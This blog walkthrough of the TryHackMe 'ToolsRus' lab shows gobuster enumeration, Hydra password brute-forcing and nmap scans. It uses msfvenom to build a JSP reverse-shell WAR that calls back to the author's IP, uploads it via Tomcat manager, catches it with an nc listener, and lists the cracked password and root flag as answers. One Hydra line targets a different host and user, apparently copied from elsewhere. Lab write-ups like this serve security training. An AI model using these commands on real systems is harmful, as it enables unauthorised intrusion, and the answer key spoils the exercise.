TryHackme ToolsRus Walkthrough






Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine. TryHackme ToolsRus Walkthrough



This task requires you to use the following tools:


  •     Dirbuster
  •     Hydra
  •     Nmap
  •     Nikto
  •     Metasploit





1) What directory can you find, that begins with a g?


gobuster -x .php,.txt,.html dir -u http://10.10.194.132 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt



Ans :-  Directory :- /guidelines
Directory :- /protected



2) Whose name can you find from this directory?



http://10.10.194.132/guidelines/


Ans :- username :- bob




3) What directory has basic authentication?



Ans :- protected





4) What is bob's password to the protected part of the website?
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
 




hydra -l bob -P /home/hackerboy/Documents/rockyou.txt 10.10.194.132 http-get "/protected"



Ans :- password :-bubbles






5) What other port that serves a webs service is open on the machine?
nmap -sC -sV -Pn 10.10.194.132




Answer :- 1234






6) Going to the service running on that port, what is the name and version of the software?
Answer format: Full_name_of_service/Version




nmap -sC -sV -Pn 10.10.194.132




Answer :- Apache Tomcat/7.0.88





7) Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
How many documentation files did Nikto identify?




( after login - Bob’s login credential works for us. Let see what is inside the dashboard. )



Answer :- 5





8) What is the server version (run the scan against port 80)?
nmap -sC -sV -Pn 10.10.194.132




Answer :- Apache/2.4.18





9) What version of Apache-Coyote is this service using?
version of Apache-Coyote
 



Answer :- 1.1




10) Use Metasploit to exploit the service and get a shell on the system.
What user did you get a shell as?



Answer :- root




11) What text is in the file /root/flag.txt



msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.61.234  LPORT=4444 -f war > shell.war

then,
10.8.61.234 :- it's a tunnel IP ( check tunnel IP in terminal "ip addr"

login and upload a shell in application manager


nc -lvnp 4444




whoami

ls

cat flag.txt



Answer :- ff1fc4a81affcc7688cf89ae7dc6e0e1





Video Tutorial :- Soon...

 

Disclaimer



This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)





Post a Comment

Previous Post Next Post

Contact Form